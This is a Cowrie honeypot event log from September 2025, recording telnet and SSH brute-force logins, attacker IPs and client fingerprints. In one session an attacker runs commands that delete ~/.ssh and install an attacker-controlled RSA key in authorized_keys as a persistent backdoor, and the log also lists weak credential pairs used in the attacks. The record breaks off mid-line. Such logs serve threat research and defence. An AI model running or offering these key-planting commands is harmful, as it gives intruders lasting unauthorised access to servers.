{"eventid":"cowrie.login.failed","username":"administrator","password":"123","message":"login attempt [administrator/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:32:51.270138Z","src_ip":"134.199.174.250","session":"4d02b2c9c35c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:52.612366Z","src_ip":"134.199.174.250","session":"4d02b2c9c35c"}
{"eventid":"cowrie.session.closed","duration":12.799678564071655,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:52.830567Z","src_ip":"212.227.125.160","session":"186018fc77c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25145,"dst_ip":"1.2.3.4","dst_port":23,"session":"37a50c83a9f4","protocol":"telnet","message":"New connection: 212.227.125.160:25145 (1.2.3.4:23) [session: 37a50c83a9f4]","sensor":"my-vps","timestamp":"2025-09-08T13:32:53.054622Z"}
{"eventid":"cowrie.session.closed","duration":12.705502986907959,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:55.750778Z","src_ip":"212.227.235.229","session":"735057881b3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12412,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0f1b700c2e4","protocol":"telnet","message":"New connection: 212.227.235.229:12412 (1.2.3.4:23) [session: f0f1b700c2e4]","sensor":"my-vps","timestamp":"2025-09-08T13:32:56.017364Z"}
{"eventid":"cowrie.session.closed","duration":12.787138223648071,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:57.702306Z","src_ip":"212.227.235.229","session":"5c259a41176d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60720,"dst_ip":"1.2.3.4","dst_port":23,"session":"135740834373","protocol":"telnet","message":"New connection: 212.227.235.229:60720 (1.2.3.4:23) [session: 135740834373]","sensor":"my-vps","timestamp":"2025-09-08T13:32:57.930624Z"}
{"eventid":"cowrie.session.closed","duration":12.802805423736572,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:05.857370Z","src_ip":"212.227.125.160","session":"37a50c83a9f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18645,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b2c8b7e3cf9","protocol":"telnet","message":"New connection: 212.227.125.160:18645 (1.2.3.4:23) [session: 7b2c8b7e3cf9]","sensor":"my-vps","timestamp":"2025-09-08T13:33:06.173040Z"}
{"eventid":"cowrie.session.closed","duration":12.720693588256836,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:08.737981Z","src_ip":"212.227.235.229","session":"f0f1b700c2e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14830,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa54f8fea9a2","protocol":"telnet","message":"New connection: 212.227.235.229:14830 (1.2.3.4:23) [session: fa54f8fea9a2]","sensor":"my-vps","timestamp":"2025-09-08T13:33:09.012315Z"}
{"eventid":"cowrie.session.closed","duration":12.787964105606079,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:10.718529Z","src_ip":"212.227.235.229","session":"135740834373"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32795,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfa42e1cb0f5","protocol":"telnet","message":"New connection: 212.227.235.229:32795 (1.2.3.4:23) [session: bfa42e1cb0f5]","sensor":"my-vps","timestamp":"2025-09-08T13:33:11.011806Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33688,"dst_ip":"1.2.3.4","dst_port":22,"session":"79177e0f5982","protocol":"ssh","message":"New connection: 212.227.235.229:33688 (1.2.3.4:22) [session: 79177e0f5982]","sensor":"my-vps","timestamp":"2025-09-08T13:33:12.269699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:12.270880Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:12.495359Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.login.success","username":"root","password":"cloud123","message":"login attempt [root/cloud123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:33:13.437969Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:33:13.930144Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:33:13.930952Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:33:13.932032Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:14.157422Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:33:14.696231Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:33:14.697016Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:33:14.925029Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:14.926120Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34688,"dst_ip":"1.2.3.4","dst_port":22,"session":"01af3d333dc5","protocol":"ssh","message":"New connection: 212.227.235.229:34688 (1.2.3.4:22) [session: 01af3d333dc5]","sensor":"my-vps","timestamp":"2025-09-08T13:33:15.150710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:15.153352Z","src_ip":"212.227.235.229","session":"01af3d333dc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:15.378394Z","src_ip":"212.227.235.229","session":"01af3d333dc5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:16.282933Z","src_ip":"212.227.235.229","session":"01af3d333dc5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:17.511812Z","src_ip":"212.227.235.229","session":"01af3d333dc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35536,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca4388b29fbc","protocol":"ssh","message":"New connection: 212.227.235.229:35536 (1.2.3.4:22) [session: ca4388b29fbc]","sensor":"my-vps","timestamp":"2025-09-08T13:33:17.739547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:17.740479Z","src_ip":"212.227.235.229","session":"ca4388b29fbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:17.968933Z","src_ip":"212.227.235.229","session":"ca4388b29fbc"}
{"eventid":"cowrie.session.closed","duration":12.650368928909302,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:18.823314Z","src_ip":"212.227.125.160","session":"7b2c8b7e3cf9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:33:18.918143Z","src_ip":"212.227.235.229","session":"ca4388b29fbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20113,"dst_ip":"1.2.3.4","dst_port":23,"session":"7cee5ee22c70","protocol":"telnet","message":"New connection: 212.227.125.160:20113 (1.2.3.4:23) [session: 7cee5ee22c70]","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.099597Z"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.147448Z","src_ip":"212.227.235.229","session":"79177e0f5982"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.148504Z","src_ip":"212.227.235.229","session":"ca4388b29fbc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58556,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0751a49ccec","protocol":"ssh","message":"New connection: 134.199.174.250:58556 (1.2.3.4:22) [session: d0751a49ccec]","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.507317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.510759Z","src_ip":"134.199.174.250","session":"d0751a49ccec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:33:19.816634Z","src_ip":"134.199.174.250","session":"d0751a49ccec"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"qwerty123","message":"login attempt [administrator/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:20.826065Z","src_ip":"134.199.174.250","session":"d0751a49ccec"}
{"eventid":"cowrie.session.closed","duration":12.713358163833618,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:21.725578Z","src_ip":"212.227.235.229","session":"fa54f8fea9a2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:22.113557Z","src_ip":"134.199.174.250","session":"d0751a49ccec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9204,"dst_ip":"1.2.3.4","dst_port":23,"session":"97429947903a","protocol":"telnet","message":"New connection: 212.227.235.229:9204 (1.2.3.4:23) [session: 97429947903a]","sensor":"my-vps","timestamp":"2025-09-08T13:33:22.121060Z"}
{"eventid":"cowrie.session.closed","duration":12.67379093170166,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:23.685480Z","src_ip":"212.227.235.229","session":"bfa42e1cb0f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33121,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a1f21e4bc5e","protocol":"telnet","message":"New connection: 212.227.235.229:33121 (1.2.3.4:23) [session: 4a1f21e4bc5e]","sensor":"my-vps","timestamp":"2025-09-08T13:33:23.910865Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33064,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb50ff4e15d7","protocol":"ssh","message":"New connection: 212.227.235.229:33064 (1.2.3.4:22) [session: cb50ff4e15d7]","sensor":"my-vps","timestamp":"2025-09-08T13:33:23.984144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:23.984798Z","src_ip":"212.227.235.229","session":"cb50ff4e15d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:24.137260Z","src_ip":"212.227.235.229","session":"cb50ff4e15d7"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx1234","message":"login attempt [nginx/nginx1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:24.679418Z","src_ip":"212.227.235.229","session":"cb50ff4e15d7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:25.891017Z","src_ip":"212.227.235.229","session":"cb50ff4e15d7"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":27899,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d728e4d058","protocol":"ssh","message":"New connection: 49.247.35.31:27899 (1.2.3.4:22) [session: a9d728e4d058]","sensor":"my-vps","timestamp":"2025-09-08T13:33:26.144675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:26.154807Z","src_ip":"49.247.35.31","session":"a9d728e4d058"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:26.421741Z","src_ip":"49.247.35.31","session":"a9d728e4d058"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"qaz2wsx","message":"login attempt [nginx/qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:27.535106Z","src_ip":"49.247.35.31","session":"a9d728e4d058"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:28.815643Z","src_ip":"49.247.35.31","session":"a9d728e4d058"}
{"eventid":"cowrie.session.closed","duration":12.67929482460022,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:31.778829Z","src_ip":"212.227.125.160","session":"7cee5ee22c70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21843,"dst_ip":"1.2.3.4","dst_port":23,"session":"2015d46d74dc","protocol":"telnet","message":"New connection: 212.227.125.160:21843 (1.2.3.4:23) [session: 2015d46d74dc]","sensor":"my-vps","timestamp":"2025-09-08T13:33:31.995297Z"}
{"eventid":"cowrie.session.closed","duration":12.587486028671265,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:34.708495Z","src_ip":"212.227.235.229","session":"97429947903a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11622,"dst_ip":"1.2.3.4","dst_port":23,"session":"424c67602cc3","protocol":"telnet","message":"New connection: 212.227.235.229:11622 (1.2.3.4:23) [session: 424c67602cc3]","sensor":"my-vps","timestamp":"2025-09-08T13:33:35.058883Z"}
{"eventid":"cowrie.session.closed","duration":12.776406049728394,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:36.687205Z","src_ip":"212.227.235.229","session":"4a1f21e4bc5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32914,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d8e5347d8ed","protocol":"ssh","message":"New connection: 212.227.235.229:32914 (1.2.3.4:22) [session: 9d8e5347d8ed]","sensor":"my-vps","timestamp":"2025-09-08T13:33:36.835584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:33:36.836696Z","src_ip":"212.227.235.229","session":"9d8e5347d8ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","e